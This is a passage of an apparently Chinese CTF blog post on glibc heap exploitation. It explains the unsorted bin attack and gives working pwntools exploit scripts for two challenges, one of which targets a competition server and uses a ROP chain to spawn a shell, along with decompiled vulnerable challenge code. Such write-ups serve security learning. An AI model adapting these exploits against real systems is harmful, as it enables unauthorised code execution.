<li><p>在程序 malloc 时，如果在 fastbin，small bin 中找不到对应大小的 chunk，就会尝试从 Unsorted Bin 中寻找 chunk。如果取出来的 chunk 大小刚好满足，就会直接返回给用户，否则就会把这些 chunk 分别插入到对应的 bin 中。<br><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230507/c2yb8erimage.1m0mv03x6nc0.png"></p>
<h3 id="Unsorted-Bin-Attack-原理"><a href="#Unsorted-Bin-Attack-原理" class="headerlink" title="Unsorted Bin Attack 原理"></a>Unsorted Bin Attack 原理</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* remove from unsorted list */</span></span><br><span class="line"><span class="keyword">if</span> (__glibc_unlikely (bck-&gt;fd != victim))</span><br><span class="line">  malloc_printerr (<span class="string">&quot;malloc(): corrupted unsorted chunks 3&quot;</span>);</span><br><span class="line">unsorted_chunks (av)-&gt;bk = bck;</span><br><span class="line">bck-&gt;fd = unsorted_chunks (av);</span><br></pre></td></tr></table></figure>

<p>​    即是如果我们控制了 bk 的值，我们就能将 <code>unsorted_chunks (av)</code> 写到任意地址</p>
</li>
</ol>
</blockquote>
<h2 id="0x0-HITCON-Training-lab14-magic-heap"><a href="#0x0-HITCON-Training-lab14-magic-heap" class="headerlink" title="0x0.HITCON Training lab14 magic_heap"></a>0x0.HITCON Training lab14 magic_heap</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">c = process(&#x27;/home/c2yb8er/下载/Heap/Unsorted heap/easyheap/easyheap2.23&#x27;)</span><br><span class="line"># c = remote(&#x27;node4.buuoj.cn&#x27;,27786)</span><br><span class="line">elf = ELF(&#x27;/home/c2yb8er/下载/Heap/Unsorted heap/easyheap/easyheap2.23&#x27;)</span><br><span class="line">libc = ELF(&#x27;/home/c2yb8er/Binary/libcs/16X64&#x27;)</span><br><span class="line">context.terminal = [&#x27;gnome-terminal&#x27;, &#x27;-x&#x27;, &#x27;sh&#x27;, &#x27;-c&#x27;]</span><br><span class="line">context.arch = &#x27;amd64&#x27;</span><br><span class="line"># context.log_level = &#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">def Create(size,content):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)</span><br><span class="line">    c.send(b&#x27;1&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;Size of Heap : &#x27;)</span><br><span class="line">    c.send(str(size))</span><br><span class="line">    c.recvuntil(b&#x27;Content of heap:&#x27;)</span><br><span class="line">    c.send(content)</span><br><span class="line"></span><br><span class="line">def Edit(idx,size,content):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)</span><br><span class="line">    c.send(b&#x27;2&#x27;)  </span><br><span class="line">    c.recvuntil(b&#x27;Index :&#x27;)  </span><br><span class="line">    c.send(str(idx))</span><br><span class="line">    c.recvuntil(b&#x27;Size of Heap : &#x27;)</span><br><span class="line">    c.send(str(size))</span><br><span class="line">    c.recvuntil(b&#x27;Content of heap : &#x27;)</span><br><span class="line">    c.send(content)</span><br><span class="line"></span><br><span class="line">def Delete(idx):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)</span><br><span class="line">    c.send(b&#x27;3&#x27;)  </span><br><span class="line">    c.recvuntil(b&#x27;Index :&#x27;)  </span><br><span class="line">    c.send(str(idx))    </span><br><span class="line"></span><br><span class="line">magic = 0x6020C0</span><br><span class="line">Create(0x18, &#x27;a&#x27;) #0</span><br><span class="line">Create(0x88, &#x27;b&#x27;) #1</span><br><span class="line">Create(0x18, &#x27;c&#x27;) #2</span><br><span class="line"></span><br><span class="line">Delete(1)</span><br><span class="line">payload = b&#x27;a&#x27; * 0x10 + p64(0) + p64(0x91) + p64(0) + p64(magic - 0x10) </span><br><span class="line">Edit(0, len(payload), payload)</span><br><span class="line"></span><br><span class="line">Create(0x88, &#x27;d&#x27;) # 为什么再次create一个chunk就能直接修改了？</span><br><span class="line"></span><br><span class="line">c.sendlineafter(&quot;Your choice :&quot;, &quot;4869&quot;)</span><br><span class="line"></span><br><span class="line">c.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="0x1-ISCC2023-擂台赛第一题-ezheap"><a href="#0x1-ISCC2023-擂台赛第一题-ezheap" class="headerlink" title="0x1.ISCC2023_擂台赛第一题:ezheap"></a>0x1.ISCC2023_擂台赛第一题:ezheap</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> buf[<span class="number">256</span>]; <span class="comment">// [rsp+0h] [rbp-120h] BYREF</span></span><br><span class="line">  <span class="type">int</span> idx_1; <span class="comment">// [rsp+100h] [rbp-20h]</span></span><br><span class="line">  <span class="type">int</span> idx_0; <span class="comment">// [rsp+104h] [rbp-1Ch]</span></span><br><span class="line">  <span class="type">void</span> *ptr; <span class="comment">// [rsp+108h] [rbp-18h]</span></span><br><span class="line">  <span class="type">int</span> size; <span class="comment">// [rsp+114h] [rbp-Ch]</span></span><br><span class="line">  <span class="type">int</span> idx; <span class="comment">// [rsp+118h] [rbp-8h]</span></span><br><span class="line">  <span class="type">int</span> choice; <span class="comment">// [rsp+11Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  setbuf(<span class="built_in">stdin</span>, <span class="number">0LL</span>);</span><br><span class="line">  setbuf(_bss_start, <span class="number">0LL</span>);</span><br><span class="line">  setbuf(<span class="built_in">stderr</span>, <span class="number">0LL</span>);</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    choice = menu();</span><br><span class="line">    <span class="keyword">if</span> ( choice == <span class="number">5</span> )</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">switch</span> ( choice )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line">        idx = get_idx();</span><br><span class="line">        size = get_size();</span><br><span class="line">        ptr = <span class="built_in">malloc</span>(size);</span><br><span class="line">        <span class="keyword">if</span> ( !ptr )</span><br><span class="line">          die(<span class="string">&quot;malloc error&quot;</span>);</span><br><span class="line">        ptrs[idx] = ptr;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">        idx_0 = get_idx();</span><br><span class="line">        <span class="built_in">free</span>(ptrs[idx_0]);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">3</span>:</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;unimplemented yet&quot;</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="number">4</span>: <span class="comment">// &lt;-------edit函数，由于没有检测chunk是否被释放我们下文可以在这里作文章</span></span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;unimplemented yet&quot;</span>);</span><br><span class="line">        idx_1 = get_idx();</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;input content plz : &quot;</span>);</span><br><span class="line">        <span class="keyword">if</span> ( read(<span class="number">0</span>, ptrs[idx_1], <span class="number">16uLL</span>) &lt; <span class="number">0</span> )</span><br><span class="line">          die(<span class="string">&quot;read error&quot;</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      <span class="keyword">default</span>:</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;wrong choice&quot;</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( magics[<span class="number">255</span>] &gt; <span class="number">0x7F0000000000</span>LL )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;input your key&quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, buf, <span class="number">0x100</span>uLL);</span><br><span class="line">    check_key(buf);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> __cdecl <span class="title function_">check_key</span><span class="params">(<span class="type">char</span> *input)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> buf[<span class="number">15</span>]; <span class="comment">// [rsp+10h] [rbp-10h] BYREF</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">memcpy</span>(buf, input, <span class="number">0x100</span>uLL);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> __cdecl <span class="title function_">door</span><span class="params">()</span>  <span class="comment">//焯，原来直接有现成的，我直接ROP麻烦了一丢丢。</span></span><br><span class="line">&#123;</span><br><span class="line">  system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="简单说一下思路："><a href="#简单说一下思路：" class="headerlink" title="简单说一下思路："></a>简单说一下思路：</h3><ol>
<li><p>新建三个chunk(一般是这样)：其中第一chunk用来溢出修改chunk2，第二个chunk用来攻击，第三个chunk用来隔绝top chunk。</p>
<p>但是由于这道题的特殊性，因为edit函数并没有检查chunk是否被释放，所以我们不需要通过chunk1来修改chunk2而是直接通过chunk2本身进行修改！于是新建两个chunk就足够：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk1</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">pre | size  </span><br><span class="line">fd  | bk	 &lt;---chunk2</span><br><span class="line">content</span><br><span class="line">------------------------------------------</span><br><span class="line">Top chunk</span><br></pre></td></tr></table></figure></li>
<li><p>释放chunk1后，修改其bk指针为<code>magics[255]</code>的地址</p>
</li>
<li><p>重新申请一个chunk即可。</p>
</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"># c = process(&#x27;/home/c2yb8er/下载/ISCC2023/擂台赛第一题/heap2.23&#x27;)</span><br><span class="line">c = remote(&quot;59.110.164.72&quot;,10022)</span><br><span class="line">elf = ELF(&#x27;/home/c2yb8er/下载/ISCC2023/擂台赛第一题/heap2.23&#x27;)</span><br><span class="line"># libc = ELF(&#x27;/home/c2yb8er/Binary/libcs/16X64&#x27;)</span><br><span class="line">context.terminal = [&#x27;gnome-terminal&#x27;, &#x27;-x&#x27;, &#x27;sh&#x27;, &#x27;-c&#x27;]</span><br><span class="line">context.arch = &#x27;amd64&#x27;</span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">def add(idx):</span><br><span class="line">    c.recvuntil(b&#x27;input your choice : &#x27;)</span><br><span class="line">    c.send(b&#x27;1&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;input idx plz : &#x27;)</span><br><span class="line">    c.send(str(idx))</span><br><span class="line">    c.recvuntil(b&#x27;input size plz : &#x27;)</span><br><span class="line">    c.send(b&#x27;129&#x27;)</span><br><span class="line"></span><br><span class="line">def edit(idx,content):</span><br><span class="line">    c.recvuntil(b&#x27;input your choice : &#x27;)</span><br><span class="line">    c.send(b&#x27;4&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;input idx plz : &#x27;)</span><br><span class="line">    c.send(str(idx))</span><br><span class="line">    c.recvuntil(b&#x27;input content plz : &#x27;)</span><br><span class="line">    c.send(content)</span><br><span class="line"></span><br><span class="line">def rm(idx):</span><br><span class="line">    c.recvuntil(b&#x27;input your choice : &#x27;)</span><br><span class="line">    c.send(b&#x27;2&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;input idx plz : &#x27;)</span><br><span class="line">    c.send(str(idx))</span><br><span class="line"></span><br><span class="line">bin_sh = 0x400C86</span><br><span class="line">system_addr = elf.sym[&#x27;system&#x27;]</span><br><span class="line"></span><br><span class="line"># for i in range(30):</span><br><span class="line">#     add(i)</span><br><span class="line"></span><br><span class="line">add(0)</span><br><span class="line">add(1)</span><br><span class="line">rm(0)</span><br><span class="line"></span><br><span class="line">edit(0,p64(0) + p64(0x6029b0-0x8))</span><br><span class="line"></span><br><span class="line">add(2)</span><br><span class="line"></span><br><span class="line">c.send(b&#x27;5&#x27;)</span><br><span class="line"># gdb.attach(c)</span><br><span class="line"># pause()</span><br><span class="line">pop_rdi_ret = 0x400bf3</span><br><span class="line">payload = b&#x27;a&#x27;*0x18 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)</span><br><span class="line">c.recvuntil(b&#x27;input your key\n&#x27;)</span><br><span class="line">c.send(payload)</span><br><span class="line">c.interactive()</span><br></pre></td></tr></table></figure>


            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li>
            <span class="type">本文标题</span>：<span class="content">Heap刷题记录</span>
        </li>
        <li>
            <span class="type">本文作者</span>：<span class="content">二十八华生</span>
        </li>
        <li>
            <span class="type">创建时间</span>：<span class="content">2023-05-02 21:18:55</span>
        </li>
        <li class="post-link">
            <span class="type">本文链接</span>：<span class="content">2023/05/02/0_PWN/Heap刷题记录/</span>
        </li>
        <li>
            <span class="type">版权声明</span>：<span class="content">本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！</span>
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/Heap/">#Heap</a>&nbsp;
                        </li>
                    
                </ul>
            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                               rel="prev"
                               href="/2023/05/26/DASBOOK/"
                            >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                                <span class="title flex-center">
                                <span class="post-nav-title-item">DASBOOK-Web</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                               rel="next"
                               href="/2023/03/05/0_PWN/Pwngdb%E6%8C%87%E5%8D%97/"
                            >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">Pwn工具指北</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                                <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                            </a>
                        </div>
                    
                </div>
            

            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Off-by-one"><span class="nav-text">Off-by-one</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x0"><span class="nav-text">0x0</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x1-ISCC2023-your-character"><span class="nav-text">0x1.ISCC2023_your_character</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#UAF"><span class="nav-text">UAF:</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x0-hitcon-training-hacknote"><span class="nav-text">0x0:hitcon-training-hacknote</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x1-ACTF-2019-babyheap"><span class="nav-text">0x1:ACTF_2019_babyheap</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Fastbin-Attack"><span class="nav-text">Fastbin Attack</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x0-babyheap-0ctf-2017"><span class="nav-text">0x0:babyheap_0ctf_2017</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0-%E6%88%91%E5%86%B3%E5%AE%9A%E4%B8%8B%E5%B7%A5%E5%A4%AB%E6%9D%A5%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90%E4%B8%80%E6%B3%A2%EF%BC%81"><span class="nav-text">0.我决定下工夫来静态分析一波！</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#main%E5%87%BD%E6%95%B0"><span class="nav-text">main函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Init%E5%87%BD%E6%95%B0"><span class="nav-text">Init函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SizeChoice%E5%87%BD%E6%95%B0"><span class="nav-text">SizeChoice函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#sub-123D%E5%87%BD%E6%95%B0%E2%80%93-gt-read-one-by-one%E5%87%BD%E6%95%B0"><span class="nav-text">sub_123D函数–&gt;read_one_by_one函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Allocate%E5%87%BD%E6%95%B0"><span class="nav-text">Allocate函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Fill%E5%87%BD%E6%95%B0"><span class="nav-text">Fill函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Free%E5%87%BD%E6%95%B0"><span class="nav-text">Free函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Dump%E5%87%BD%E6%95%B0"><span class="nav-text">Dump函数</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0%EF%BC%9A"><span class="nav-text">1.漏洞成因：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="nav-text">2.思路：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E6%B5%81%E7%A8%8B%EF%BC%9A"><span class="nav-text">3.流程：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8Bmmap%E5%87%BD%E6%95%B0%E5%88%86%E9%85%8D%E5%9C%B0%E5%9D%80%E5%8F%8A%E5%85%B6%E5%86%85%E5%AE%B9%EF%BC%9A"><span class="nav-text">查看mmap函数分配地址及其内容：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B3%84%E9%9C%B2unsortbin-addr%E5%9C%B0%E5%9D%80"><span class="nav-text">泄露unsortbin_addr地址</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9chunk2%E7%9A%84fd%E4%BD%BF%E5%BE%97%E5%85%B6%E6%8C%87%E5%90%91%E4%B8%BAchunk5"><span class="nav-text">修改chunk2的fd使得其指向为chunk5</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9chunk5%E7%9A%84size%E5%A4%A7%E5%B0%8F%EF%BC%8C%E4%BB%8E%E8%80%8C%E8%83%BD%E5%A4%9F%E5%9C%A8fastbin-0x20%E8%BF%99%E6%9D%A1%E9%93%BE%E4%B8%8A%E6%93%8D%E4%BD%9C%EF%BC%9A"><span class="nav-text">修改chunk5的size大小，从而能够在fastbin:0x20这条链上操作：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%93%8D%E4%BD%9Cfastbin-0x20%E8%BF%99%E6%9D%A1%E9%93%BE"><span class="nav-text">操作fastbin:0x20这条链</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9chunk5%E7%9A%84size%E5%A4%A7%E5%B0%8F%EF%BC%8C%E4%BB%8E%E8%80%8C%E8%83%BD%E5%A4%9F%E5%9C%A8free%E5%90%8E%E5%88%86%E9%85%8D%E5%88%B0unsorted-bin%E4%B8%AD%EF%BC%9A"><span class="nav-text">修改chunk5的size大小，从而能够在free后分配到unsorted bin中：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8E%BB%E9%99%A4top-chunk%E5%AF%B9chunk5%E7%9A%84%E5%BD%B1%E5%93%8D"><span class="nav-text">去除top_chunk对chunk5的影响:</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%A9%E7%94%A8chunk5%E8%8E%B7%E5%8F%96main-arena%E5%9C%B0%E5%9D%80"><span class="nav-text">利用chunk5获取main_arena地址</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Try-to-Getshell%EF%BC%81"><span class="nav-text">Try to Getshell！</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#new-%E4%B8%80%E4%B8%AAchunk7"><span class="nav-text">new 一个chunk7</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%80%9A%E8%BF%87%E4%BF%AE%E6%94%B9%E9%87%8D%E5%90%AF%E7%9A%84chunk5%E6%9D%A5%E4%BF%AE%E6%94%B9chunk7"><span class="nav-text">通过修改重启的chunk5来修改chunk7</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AF%BB%E6%89%BEfake-chunk%E7%9A%84%E6%96%B9%E6%B3%95%EF%BC%9A"><span class="nav-text">寻找fake_chunk的方法：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E7%BB%AD%E6%8E%A5%E4%B8%8A%E6%96%87%E4%BF%AE%E6%94%B9chunk7"><span class="nav-text">续接上文修改chunk7</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%8E%A7%E5%88%B6fake-chunk%EF%BC%8C%E9%80%9A%E8%BF%87one-gadget%E4%BB%8E%E8%80%8Cgetshell%EF%BC%81"><span class="nav-text">控制fake_chunk，通过one_gadget从而getshell！</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#malloc-hook%EF%BC%9A"><span class="nav-text">malloc_hook：</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%B8%8D%E7%9F%A5%E9%81%93%E4%B8%BA%E4%BB%80%E4%B9%88%E8%BF%9C%E7%A8%8B%E9%80%9A%E4%BA%86%EF%BC%8C%E6%9C%AC%E5%9C%B0%E6%B2%A1%E9%80%9A"><span class="nav-text">不知道为什么远程通了，本地没通</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Unsorted-Bin-Attack"><span class="nav-text">Unsorted Bin Attack</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Unsorted-Bin%E5%9F%BA%E6%9C%AC%E6%9D%A5%E6%BA%90"><span class="nav-text">Unsorted Bin基本来源</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Unsorted-Bin%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8%E6%83%85%E5%86%B5"><span class="nav-text">Unsorted Bin基本使用情况</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Unsorted-Bin-Attack-%E5%8E%9F%E7%90%86"><span class="nav-text">Unsorted Bin Attack 原理</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x0-HITCON-Training-lab14-magic-heap"><span class="nav-text">0x0.HITCON Training lab14 magic_heap</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x1-ISCC2023-%E6%93%82%E5%8F%B0%E8%B5%9B%E7%AC%AC%E4%B8%80%E9%A2%98-ezheap"><span class="nav-text">0x1.ISCC2023_擂台赛第一题:ezheap</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E8%AF%B4%E4%B8%80%E4%B8%8B%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="nav-text">简单说一下思路：</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2023</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">二十八华生</a>
            
        </div>
        
            <script async data-pjax
                    src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                
                    总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.5.2</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
